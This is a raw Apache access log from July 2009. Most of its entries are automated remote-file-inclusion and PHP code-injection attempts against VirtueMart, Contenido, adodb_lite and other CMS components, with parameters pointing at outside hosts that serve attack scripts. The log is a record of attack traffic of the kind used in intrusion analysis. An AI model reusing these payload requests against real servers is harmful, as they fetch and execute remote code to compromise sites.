66.197.183.21 - - [03/Jul/2009:04:35:12 +0000] "GET /logs/components/com_virtuemart/install.php?mosConfig_absolute_path=http://sunset-travel.ro/ro/cache/devid.txt%0D?? HTTP/1.1" 404 319
123.242.165.138 - - [03/Jul/2009:04:39:36 +0000] "GET /logs/access_log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 302
123.242.165.138 - - [03/Jul/2009:04:39:57 +0000] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 291
74.6.8.98 - - [03/Jul/2009:04:42:08 +0000] "GET /logs/?S=D HTTP/1.0" 200 1867
222.122.79.200 - - [03/Jul/2009:05:05:07 +0000] "GET /logs/access_log%20%20//skin/zero_vote/error.php?dir=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 320
222.122.79.200 - - [03/Jul/2009:05:05:07 +0000] "GET //skin/zero_vote/error.php?dir=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 302
222.122.79.200 - - [03/Jul/2009:05:05:07 +0000] "GET /logs//skin/zero_vote/error.php?dir=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 307
72.14.199.85 - - [03/Jul/2009:05:30:40 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
207.58.155.223 - - [03/Jul/2009:05:47:49 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 328
207.58.155.223 - - [03/Jul/2009:05:47:49 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 333
207.58.155.223 - - [03/Jul/2009:05:47:49 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 344
217.172.179.213 - - [03/Jul/2009:05:48:09 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 333
217.172.179.213 - - [03/Jul/2009:05:48:09 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 328
217.172.179.213 - - [03/Jul/2009:05:48:09 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 344
207.58.155.223 - - [03/Jul/2009:05:50:16 +0000] "GET /logs/access_log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 346
219.85.63.226 - - [03/Jul/2009:06:00:39 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 331
219.85.63.226 - - [03/Jul/2009:06:00:39 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 347
219.85.63.226 - - [03/Jul/2009:06:00:39 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 336
219.85.63.226 - - [03/Jul/2009:06:00:41 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 336
219.85.63.226 - - [03/Jul/2009:06:00:41 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 347
219.85.63.226 - - [03/Jul/2009:06:00:41 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 331
219.85.63.226 - - [03/Jul/2009:06:00:48 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 336
219.85.63.226 - - [03/Jul/2009:06:00:48 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 347
219.85.63.226 - - [03/Jul/2009:06:00:48 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 331
219.85.63.226 - - [03/Jul/2009:06:01:10 +0000] "GET /logs/access_log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 349
219.85.63.226 - - [03/Jul/2009:06:01:10 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 331
219.85.63.226 - - [03/Jul/2009:06:01:10 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 336
219.85.63.226 - - [03/Jul/2009:06:01:11 +0000] "GET /logs/access_log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 349
219.85.63.226 - - [03/Jul/2009:06:01:11 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 331
219.85.63.226 - - [03/Jul/2009:06:01:11 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 336
219.85.63.226 - - [03/Jul/2009:06:02:43 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 331
219.85.63.226 - - [03/Jul/2009:06:02:43 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 347
219.85.63.226 - - [03/Jul/2009:06:02:49 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 336
123.143.98.5 - - [03/Jul/2009:06:04:19 +0000] "GET //config/dbutil.bck.php?confdir=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 299
123.143.98.5 - - [03/Jul/2009:06:04:19 +0000] "GET /logs//config/dbutil.bck.php?confdir=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 304
123.143.98.5 - - [03/Jul/2009:06:04:19 +0000] "GET /logs/access_log%20%20//config/dbutil.bck.php?confdir=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 317
72.82.228.83 - - [03/Jul/2009:06:07:25 +0000] "GET /logs/access_log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 333
72.82.228.83 - - [03/Jul/2009:06:07:28 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 317
72.82.228.83 - - [03/Jul/2009:06:07:28 +0000] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 322
123.143.98.5 - - [03/Jul/2009:06:07:56 +0000] "GET /logs/access_log//config/dbutil.bck.php?confdir=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 315
217.172.179.213 - - [03/Jul/2009:06:11:36 +0000] "GET /logs/access_log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 335
217.172.179.213 - - [03/Jul/2009:06:11:36 +0000] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 324
217.172.179.213 - - [03/Jul/2009:06:11:36 +0000] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 319
200.140.135.86 - - [03/Jul/2009:06:11:52 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dir.myftp.org/c/idxxx.txt??? HTTP/1.1" 404 344
200.140.135.86 - - [03/Jul/2009:06:11:53 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dir.myftp.org/c/idxxx.txt??? HTTP/1.1" 404 328
200.140.135.86 - - [03/Jul/2009:06:11:53 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dir.myftp.org/c/idxxx.txt??? HTTP/1.1" 404 333
200.103.16.12 - - [03/Jul/2009:06:14:18 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://carrster.com/vnc/fx29id.txt?? HTTP/1.1" 404 328
200.103.16.12 - - [03/Jul/2009:06:14:18 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://carrster.com/vnc/fx29id.txt?? HTTP/1.1" 404 333
200.103.16.12 - - [03/Jul/2009:06:14:18 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://carrster.com/vnc/fx29id.txt?? HTTP/1.1" 404 344
66.249.71.104 - - [03/Jul/2009:06:14:46 +0000] "GET /robots.txt HTTP/1.1" 404 287
200.103.16.12 - - [03/Jul/2009:06:17:51 +0000] "GET /logs/access_log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://carrster.com/vnc/fx29id.txt?? HTTP/1.1" 404 346
200.93.147.154 - - [03/Jul/2009:06:19:56 +0000] "GET /logs/access_log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 298
200.93.147.154 - - [03/Jul/2009:06:19:56 +0000] "GET ////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 125
200.93.147.154 - - [03/Jul/2009:06:19:56 +0000] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 1886
200.93.147.154 - - [03/Jul/2009:06:19:57 +0000] "GET ////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 125
200.93.147.154 - - [03/Jul/2009:06:19:57 +0000] "GET /logs/access_log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 298
200.93.147.154 - - [03/Jul/2009:06:19:57 +0000] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 1886
219.85.63.226 - - [03/Jul/2009:06:20:54 +0000] "GET //include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 303
219.85.63.226 - - [03/Jul/2009:06:20:54 +0000] "GET /logs/access_log%20%20//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 321
219.85.63.226 - - [03/Jul/2009:06:20:54 +0000] "GET /logs//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 308
219.85.63.226 - - [03/Jul/2009:06:28:00 +0000] "GET /logs//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 308
219.85.63.226 - - [03/Jul/2009:06:28:00 +0000] "GET //include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 303
219.85.63.226 - - [03/Jul/2009:06:28:00 +0000] "GET /logs/access_log%20%20//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 321
66.232.143.55 - - [03/Jul/2009:06:29:28 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 317
66.232.143.55 - - [03/Jul/2009:06:29:28 +0000] "GET /logs/access_log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 333
66.232.143.55 - - [03/Jul/2009:06:29:28 +0000] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 322
72.14.199.85 - - [03/Jul/2009:06:30:41 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
69.94.27.217 - - [03/Jul/2009:06:31:38 +0000] "GET /logs/access_log//skin/zero_vote/login.php?dir=http://www.lightingmania.com/yes.txt??? HTTP/1.1" 404 318
69.94.27.217 - - [03/Jul/2009:06:31:38 +0000] "GET //skin/zero_vote/login.php?dir=http://www.lightingmania.com/yes.txt??? HTTP/1.1" 404 302
69.94.27.217 - - [03/Jul/2009:06:31:39 +0000] "GET /logs//skin/zero_vote/login.php?dir=http://www.lightingmania.com/yes.txt??? HTTP/1.1" 404 307
209.51.133.202 - - [03/Jul/2009:06:38:05 +0000] "GET /logs/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 292
209.51.133.202 - - [03/Jul/2009:06:38:05 +0000] "GET /errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 287
209.51.133.202 - - [03/Jul/2009:06:38:06 +0000] "GET /logs/access_log/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 303
209.51.133.202 - - [03/Jul/2009:06:40:22 +0000] "GET /logs/access_log%20%20/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 305
72.29.81.145 - - [03/Jul/2009:06:42:39 +0000] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 338
72.29.81.145 - - [03/Jul/2009:06:42:39 +0000] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 333
72.29.81.145 - - [03/Jul/2009:06:42:41 +0000] "GET /logs/access_log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 349
209.51.133.202 - - [03/Jul/2009:06:48:43 +0000] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 357
209.51.133.202 - - [03/Jul/2009:06:48:43 +0000] "GET /logs/access_log%20%20/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 370
209.51.133.202 - - [03/Jul/2009:06:48:43 +0000] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 352
66.135.42.164 - - [03/Jul/2009:06:48:54 +0000] "GET /errors.php?error=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 287
66.135.42.164 - - [03/Jul/2009:06:48:54 +0000] "GET /logs/errors.php?error=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 292
66.135.42.164 - - [03/Jul/2009:06:48:54 +0000] "GET /logs/access_log%20%20/errors.php?error=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 305
66.197.183.21 - - [03/Jul/2009:06:50:39 +0000] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://pokolake.land.ru/testv.txt??? HTTP/1.1" 404 352
66.197.183.21 - - [03/Jul/2009:06:50:39 +0000] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://pokolake.land.ru/testv.txt??? HTTP/1.1" 404 357
85.25.147.102 - - [03/Jul/2009:06:51:12 +0000] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://carrster.com/vnc/fx29id.txt?? HTTP/1.1" 404 357
85.25.147.102 - - [03/Jul/2009:06:51:12 +0000] "GET /logs/access_log%20%20/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://carrster.com/vnc/fx29id.txt?? HTTP/1.1" 404 370
85.25.147.102 - - [03/Jul/2009:06:51:12 +0000] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://carrster.com/vnc/fx29id.txt?? HTTP/1.1" 404 352
66.135.42.164 - - [03/Jul/2009:06:54:44 +0000] "GET /logs/access_log/errors.php?error=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 303
58.61.164.141 - - [03/Jul/2009:06:56:07 +0000] "GET / HTTP/1.1" 200 125
66.232.143.55 - - [03/Jul/2009:06:57:51 +0000] "GET /logs/access_log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rox-crime2.no-ip.org:8080/v8.id.txt??? HTTP/1.1" 404 333
66.232.143.55 - - [03/Jul/2009:06:57:51 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rox-crime2.no-ip.org:8080/v8.id.txt??? HTTP/1.1" 404 317
66.232.143.55 - - [03/Jul/2009:06:57:51 +0000] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rox-crime2.no-ip.org:8080/v8.id.txt??? HTTP/1.1" 404 322
60.43.229.5 - - [03/Jul/2009:06:57:58 +0000] "GET /logs/access_log%20%20/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 358
60.43.229.5 - - [03/Jul/2009:06:57:58 +0000] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 345
60.43.229.5 - - [03/Jul/2009:06:57:58 +0000] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 340
200.93.147.154 - - [03/Jul/2009:06:58:08 +0000] "GET /logs/access_log////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 296
58.61.164.40 - - [03/Jul/2009:06:58:17 +0000] "GET / HTTP/1.1" 200 125
72.82.228.83 - - [03/Jul/2009:07:00:46 +0000] "GET /logs/access_log%20%20/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 305
72.82.228.83 - - [03/Jul/2009:07:00:46 +0000] "GET /errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 287
72.82.228.83 - - [03/Jul/2009:07:00:46 +0000] "GET /logs/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 292
72.82.228.83 - - [03/Jul/2009:07:01:28 +0000] "GET /logs/access_log%20%20/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 305
72.82.228.83 - - [03/Jul/2009:07:01:38 +0000] "GET /logs/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 292
72.82.228.83 - - [03/Jul/2009:07:01:43 +0000] "GET /errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 287
72.82.228.83 - - [03/Jul/2009:07:03:00 +0000] "GET /logs/access_log/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 303
72.82.228.83 - - [03/Jul/2009:07:03:00 +0000] "GET /logs/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 292
72.82.228.83 - - [03/Jul/2009:07:03:02 +0000] "GET /errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 287
72.82.228.83 - - [03/Jul/2009:07:04:07 +0000] "GET /errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 287
72.82.228.83 - - [03/Jul/2009:07:04:07 +0000] "GET /logs/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 292
72.82.228.83 - - [03/Jul/2009:07:04:07 +0000] "GET /logs/access_log/errors.php?error=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 303
80.36.80.19 - - [03/Jul/2009:07:05:06 +0000] "GET /logs/ HTTP/1.1" 200 1879
80.36.80.19 - - [03/Jul/2009:07:05:07 +0000] "GET /icons/blank.gif HTTP/1.1" 200 148
80.36.80.19 - - [03/Jul/2009:07:05:07 +0000] "GET /icons/back.gif HTTP/1.1" 200 216
80.36.80.19 - - [03/Jul/2009:07:05:07 +0000] "GET /icons/compressed.gif HTTP/1.1" 200 1038
80.36.80.19 - - [03/Jul/2009:07:05:07 +0000] "GET /icons/unknown.gif HTTP/1.1" 200 245
80.36.80.19 - - [03/Jul/2009:07:05:07 +0000] "GET /favicon.ico HTTP/1.1" 404 288
80.36.80.19 - - [03/Jul/2009:07:05:10 +0000] "GET /favicon.ico HTTP/1.1" 404 288
207.58.155.223 - - [03/Jul/2009:07:09:00 +0000] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 352
207.58.155.223 - - [03/Jul/2009:07:09:00 +0000] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 357
207.58.155.223 - - [03/Jul/2009:07:09:00 +0000] "GET /logs/access_log%20%20/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 370
200.93.147.154 - - [03/Jul/2009:07:10:57 +0000] "GET /logs/access_log////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 296
124.115.1.8 - - [03/Jul/2009:07:13:04 +0000] "GET / HTTP/1.1" 200 125
80.36.80.19 - - [03/Jul/2009:07:14:54 +0000] "GET /logs/access_log HTTP/1.1" 200 371341
80.36.80.19 - - [03/Jul/2009:07:14:57 +0000] "GET / HTTP/1.1" 200 125
124.115.1.7 - - [03/Jul/2009:07:20:01 +0000] "GET / HTTP/1.1" 200 125
58.61.164.39 - - [03/Jul/2009:07:25:07 +0000] "GET / HTTP/1.1" 200 125
74.53.70.114 - - [03/Jul/2009:07:27:18 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 337
74.53.70.114 - - [03/Jul/2009:07:27:18 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 321
74.53.70.114 - - [03/Jul/2009:07:27:18 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 326
74.53.70.114 - - [03/Jul/2009:07:27:22 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 321
74.53.70.114 - - [03/Jul/2009:07:27:22 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 337
74.53.70.114 - - [03/Jul/2009:07:27:22 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 326
74.53.70.114 - - [03/Jul/2009:07:28:41 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 339
202.181.243.113 - - [03/Jul/2009:07:28:55 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 339
202.181.243.113 - - [03/Jul/2009:07:28:55 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 326
202.181.243.113 - - [03/Jul/2009:07:28:55 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 321
74.53.70.114 - - [03/Jul/2009:07:28:56 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 339
88.191.37.60 - - [03/Jul/2009:07:29:07 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 321
88.191.37.60 - - [03/Jul/2009:07:29:07 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 326
88.191.37.60 - - [03/Jul/2009:07:29:07 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 337
202.181.243.113 - - [03/Jul/2009:07:29:18 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 321
202.181.243.113 - - [03/Jul/2009:07:29:19 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 337
72.14.199.85 - - [03/Jul/2009:07:30:50 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
